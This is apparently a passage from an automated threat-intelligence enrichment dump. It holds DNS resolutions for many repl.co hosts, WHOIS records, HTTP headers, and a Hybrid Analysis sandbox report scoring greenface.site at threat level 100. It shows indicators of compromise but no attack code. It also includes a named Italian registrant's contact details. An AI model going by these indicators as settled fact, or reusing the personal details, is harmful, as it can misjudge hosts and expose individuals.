"jjieraacha8.repl.co": {"record_type": "A", "resolved_at": "2022-12-14T12:42:36.292539493Z"}, "www.nahom.net": {"record_type": "CNAME", "resolved_at": "2022-12-13T16:46:17.825249307Z"}, "diaznoviyanto.repl.co": {"record_type": "A", "resolved_at": "2022-12-06T12:47:45.883833821Z"}, "jacobshaw2.repl.co": {"record_type": "A", "resolved_at": "2022-11-23T13:59:13.884114917Z"}, "hrishikk.repl.co": {"record_type": "A", "resolved_at": "2022-12-16T22:49:07.934570523Z"}, "hendra99hendra9.repl.co": {"record_type": "A", "resolved_at": "2022-11-27T12:30:08.541717783Z"}, "rafidyuda.repl.co": {"record_type": "A", "resolved_at": "2022-12-12T12:35:38.342517001Z"}, "vasurao.repl.co": {"record_type": "A", "resolved_at": "2022-11-17T12:33:23.545294980Z"}, "hellbullet.repl.co": {"record_type": "A", "resolved_at": "2022-12-06T12:48:17.457590574Z"}, "iemiliia-anatol.repl.co": {"record_type": "A", "resolved_at": "2022-12-14T12:42:32.109454525Z"}, "aprilok.repl.co": {"record_type": "A", "resolved_at": "2022-12-03T12:40:06.804248630Z"}, "joeylaya.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:37:12.862713029Z"}, "adymyhay155.repl.co": {"record_type": "A", "resolved_at": "2022-11-27T12:30:33.414977422Z"}, "rafifiun.repl.co": {"record_type": "A", "resolved_at": "2022-12-16T12:35:58.018275551Z"}, "ae4038d0-4928-4494-9935-88a85cde1894.id.repl.co": {"record_type": "A", "resolved_at": "2022-12-09T12:38:09.918642159Z"}, "zeekdrich.repl.co": {"record_type": "A", "resolved_at": "2022-12-12T12:35:38.656140036Z"}, "sixxgen.tk": {"record_type": "A", "resolved_at": "2022-12-13T17:54:04.166409804Z"}, "phuthanh2020.repl.co": {"record_type": "A", "resolved_at": "2022-12-02T12:43:52.816425420Z"}, "sheerwin02.repl.co": {"record_type": "A", "resolved_at": "2022-12-06T12:48:00.114118443Z"}, "andimotovlog.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:38:06.571441651Z"}, "bgzee490.repl.co": {"record_type": "A", "resolved_at": "2022-12-05T12:36:48.547411770Z"}, "ahmedleader09.repl.co": {"record_type": "A", "resolved_at": "2022-12-11T12:41:03.653129159Z"}, "scof.sinscity.ga": {"record_type": "CNAME", "resolved_at": "2022-12-05T14:55:44.041546739Z"}, "diavanni.repl.co": {"record_type": "A", "resolved_at": "2022-11-12T12:33:58.207936247Z"}, "webhookapi.kro.kr": {"record_type": "CNAME", "resolved_at": "2022-12-08T15:16:57.445682793Z"}, "mtlavelle.repl.co": {"record_type": "A", "resolved_at": "2022-12-15T12:36:04.291309850Z"}, "ekpcfoqhduxa.repl.co": {"record_type": "A", "resolved_at": "2022-12-11T12:41:14.752212580Z"}, "amsnickoyj.repl.co": {"record_type": "A", "resolved_at": "2022-11-27T12:30:21.475829798Z"}, "furrywets.repl.co": {"record_type": "A", "resolved_at": "2022-12-13T12:38:25.444149092Z"}, "syazairy.repl.co": {"record_type": "A", "resolved_at": "2022-11-20T12:40:41.166369130Z"}, "jonnathanvirgan.repl.co": {"record_type": "A", "resolved_at": "2022-12-03T12:40:21.533451016Z"}, "muhamadtaufiq.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:37:46.161089762Z"}, "burblepeach.repl.co": {"record_type": "A", "resolved_at": "2022-12-08T12:34:10.303784876Z"}, "robertgame1.repl.co": {"record_type": "A", "resolved_at": "2022-11-24T12:38:53.918833726Z"}, "geraldjuica.repl.co": {"record_type": "A", "resolved_at": "2022-12-02T12:43:56.720634312Z"}, "gabo-contra-los.repl.co": {"record_type": "A", "resolved_at": "2022-12-03T13:03:11.081447886Z"}, "rayanofian.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:38:13.574198796Z"}, "alexanderthom12.repl.co": {"record_type": "A", "resolved_at": "2022-12-01T12:39:21.762070741Z"}, "yurusan2.repl.co": {"record_type": "A", "resolved_at": "2022-12-17T12:37:19.129519263Z"}, "docs.diracqc.com": {"record_type": "CNAME", "resolved_at": "2022-12-17T13:15:20.901807777Z"}, "skmtouz.repl.co": {"record_type": "A", "resolved_at": "2022-11-26T12:37:45.306362605Z"}, "rexisheredy.repl.co": {"record_type": "A", "resolved_at": "2022-12-15T12:36:06.866790628Z"}, "googieaccouut.repl.co": {"record_type": "A", "resolved_at": "2022-12-03T12:39:57.013654308Z"}, "theadminstartor.repl.co": {"record_type": "A", "resolved_at": "2022-12-13T12:38:39.639755764Z"}, "coleykev000.repl.co": {"record_type": "A", "resolved_at": "2022-12-04T12:37:45.007260399Z"}, "aaqiljam.repl.co": {"record_type": "A", "resolved_at": "2022-12-01T12:39:25.727943017Z"}, "dede-ajiaji.repl.co": {"record_type": "A", "resolved_at": "2022-11-25T12:38:44.258310938Z"}, "eggden.repl.co": {"record_type": "A", "resolved_at": "2022-12-16T12:35:19.089779219Z"}, "aaronsia1.repl.co": {"record_type": "A", "resolved_at": "2022-11-28T12:30:23.591880034Z"}, "itsdbehshhhej.repl.co": {"record_type": "A", "resolved_at": "2022-11-22T12:39:56.639197503Z"}, "danisauqi.repl.co": {"record_type": "A", "resolved_at": "2022-12-15T12:35:40.375943366Z"}, "mbn92.repl.co": {"record_type": "A", "resolved_at": "2022-11-23T13:59:19.586349175Z"}, "firmannurhakim.repl.co": {"record_type": "A", "resolved_at": "2022-12-06T12:48:08.473359109Z"}, "ni-komang-ari-k.repl.co": {"record_type": "A", "resolved_at": "2022-12-14T12:42:53.656398201Z"}, "rayzon123.repl.co": {"record_type": "A", "resolved_at": "2022-12-01T12:40:22.952231243Z"}, "ardianfirmansya.repl.co": {"record_type": "A", "resolved_at": "2022-12-07T12:40:34.408715788Z"}, "chandikasugara.repl.co": {"record_type": "A", "resolved_at": "2022-12-06T12:47:43.500636480Z"}, "afselliyanur.repl.co": {"record_type": "A", "resolved_at": "2022-12-03T12:40:42.214775824Z"}, "xb04102.repl.co": {"record_type": "A", "resolved_at": "2022-12-01T12:40:56.364615531Z"}}, "names": ["1a7ce7bd-aeb6-4d77-bfae-54421da18c41.id.repl.co", "rayanofian.repl.co", "adymyhay155.repl.co", "aarushk.repl.co", "nhan20001.repl.co", "ejaagbt.repl.co", "kylesukaanxiety.repl.co", "sheerwin02.repl.co", "phuthanh2020.repl.co", "gircgalici32.repl.co", "li1026490.repl.co", "yolandasintia04.rep 34.149.204.188 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:27:49 Country No Country Name Extractor 0 0 7 0 None Italy Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: +39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. 2022-12-18 00:12:24 Physical Location No ipapi.co 0 0 2 0 None Campinas, Sao Paulo, SP, Brazil, BR 20.226.56.97 2022-12-18 00:59:52 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Domain Name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-12-01T05:06:01Z Creation Date: 2000-01-03T07:35:22Z Registry Expiry Date: 2024-01-03T07:35:22Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:59:51Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-11-26T05:05:02.00Z Creation Date: 2000-01-03T07:35:22.43Z Registrar Registration Expiration Date: 2024-01-03T07:35:22.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: transferPeriod https://icann.org/epp#transferPeriod Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T21:59:51.97Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:8443 188.114.97.1 2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf:8080/ 20.226.83.185 2022-12-18 00:30:56 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: PLAGUE.BAR Registry Domain ID: D259269512-CNIC Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://namecheap.com Updated Date: 2022-11-28T12:31:46.0Z Creation Date: 2021-11-13T11:43:17.0Z Registry Expiry Date: 2023-11-13T23:59:59.0Z Registrar: Namecheap Registrar IANA ID: 1068 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod Registrant Organization: Withheld for Privacy Purposes Registrant State/Province: Capital Region Registrant Country: IS Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: DNS101.REGISTRAR-SERVERS.COM Name Server: DNS102.REGISTRAR-SERVERS.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:55.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain name: plague.bar Registry Domain ID: D259269512-CNIC Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2021-11-13T11:43:17.00Z Registrar Registration Expiration Date: 2022-11-13T11:43:17.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: REACTIVATION PERIOD Registrant Organization: Withheld for Privacy Purposes Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: reactivation-pending@mail.withheldforprivacy.com Registry Admin ID: Admin Name: REACTIVATION PERIOD Admin Organization: Withheld for Privacy Purposes Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: reactivation-pending@mail.withheldforprivacy.com Registry Tech ID: Tech Name: REACTIVATION PERIOD Tech Organization: Withheld for Privacy Purposes Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: reactivation-pending@mail.withheldforprivacy.com Name Server: dns101.registrar-servers.com Name Server: dns102.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T21:30:55.95Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:05:26 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 20, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://greenface.site/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.7.179:80"\n "142.251.33.78:443"\n "142.251.33.67:443"\n "142.250.69.200:443"\n "142.250.69.206:443"\n "142.251.215.227:443"\n "108.177.98.155:443"\n "142.251.211.227:443"\n "142.251.215.225:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"greenface.site"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5660:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5660:304:WilStaging_02"\n "Local\\SM0:5864:120:WilError_01"\n "Local\\SM0:5864:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5660:304:WilStaging_02"\n "Local\\SM0:5660:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\DBWinMutex"\n "DBWinMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8072:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"greenface.site"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00005660]\n "f_00024d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 700x280 frames 3"- [targetUID: N/A]\n "wallet-tokenization-config.json" has type "ASCII text"- Location: [%TEMP%\\5660_724844775\\json\\wallet\\wallet-tokenization-config.json]- [targetUID: 00000000-00005660]\n "2ba0ddf5-42d6-4da2-b87c-cac737035349.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "41962708-5ff7-401a-b529-72280b6896cf.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\41962708-5ff7-401a-b529-72280b6896cf.tmp]- [targetUID: 00000000-00005660]\n "383b5ee4-111b-4e65-a5e3-016134095cae.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\383b5ee4-111b-4e65-a5e3-016134095cae.tmp]- [targetUID: 00000000-00006840]\n "99b70833-a7c9-4f88-9e7f-fbfcb2bd3c6e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\99b70833-a7c9-4f88-9e7f-fbfcb2bd3c6e.tmp]- [targetUID: 00000000-00005660]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005660]\n "f_00023e" has type "ASCII text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00006840]\n "3437493e-8bd9-46b8-9074-22a4b871703a.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\3437493e-8bd9-46b8-9074-22a4b871703a.tmp]- [targetUID: 00000000-00006840]\n "03cc95bd-1754-476e-b462-79536e7625ef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\03cc95bd-1754-476e-b462-79536e7625ef.tmp]- [targetUID: 00000000-00005660]\n "f_000243" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00006840]\n "f_00023d" has type "gzip compressed data max compression"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00006840]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5660_724844775\\wallet.bundle.js]- [targetUID: 00000000-00005660]\n "wallet-drawer.html" has type "HTML document ASCII text with very long lines"- Location: [%TEMP%\\5660_724844775\\Wallet-Checkout\\wallet-drawer.html]- [targetUID: 00000000-00005660]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5660_1719137669\\shopping_iframe_driver.js]- [targetUID: 00000000-00005660]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007536]\n "wallet.html" has type "HTML document ASCII text with very long lines"- Location: [%TEMP%\\5660_724844775\\wallet.html]- [targetUID: 00000000-00005660]\n "runtime.bundle.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\5660_724844775\\runtime.bundle.js]- [targetUID: 00000000-00005660]\n "Last Browser" has type "data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://greenface.site/"\n Pattern match: "http://greenface.site"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "wallet.bundle.js" - Location: [%TEMP%\\5660_724844775\\wallet.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5660_1719137669\\shopping_iframe_driver.js]- [targetUID: 00000000-00005660]\n Dropped file: "runtime.bundle.js" - Location: [%TEMP%\\5660_724844775\\runtime.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "app-setup.js" - Location: [%TEMP%\\5660_724844775\\Wallet-Checkout\\app-setup.js]- [targetUID: 00000000-00005660]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5660_1719137669\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005660]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5660_1719137669\\product_page.js]- [targetUID: 00000000-00005660]\n Dropped file: "shopping.js" - Location: [%TEMP%\\5660_1719137669\\shopping.js]- [targetUID: 00000000-00005660]\n Dropped file: "tokenized-card.bundle.js" - Location: [%TEMP%\\5660_724844775\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "vendor.bundle.js" - Location: [%TEMP%\\5660_724844775\\vendor.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5660_1719137669\\auto_open_controller.js]- [targetUID: 00000000-00005660]\n Dropped file: "crypto.bundle.js" - Location: [%TEMP%\\5660_724844775\\crypto.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5660_1719137669\\shoppingfre.js]- [targetUID: 00000000-00005660]\n Dropped file: "wallet-drawer.bundle.js" - Location: [%TEMP%\\5660_724844775\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5660_160949656\\adblock_snippet.js]- [targetUID: 00000000-00005660]\n Dropped file: "notification.bundle.js" - Location: [%TEMP%\\5660_724844775\\Notification\\notification.bundle.js]- [targetUID: 00000000-00005660]\n 